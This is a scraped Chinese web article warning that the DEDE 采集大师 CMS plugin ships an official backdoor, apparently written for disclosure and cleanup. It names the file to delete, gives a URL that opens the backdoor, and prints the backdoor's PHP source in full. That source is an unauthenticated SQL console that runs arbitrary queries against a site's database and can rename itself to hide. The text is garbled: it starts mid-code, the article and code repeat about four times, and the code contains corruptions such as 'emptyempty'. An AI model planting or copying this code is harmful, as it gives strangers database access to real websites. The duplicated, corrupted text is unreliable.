fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>DEDE采集大师官方留后门的删除办法

DEDE采集大师官方留后门的删除办法

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> 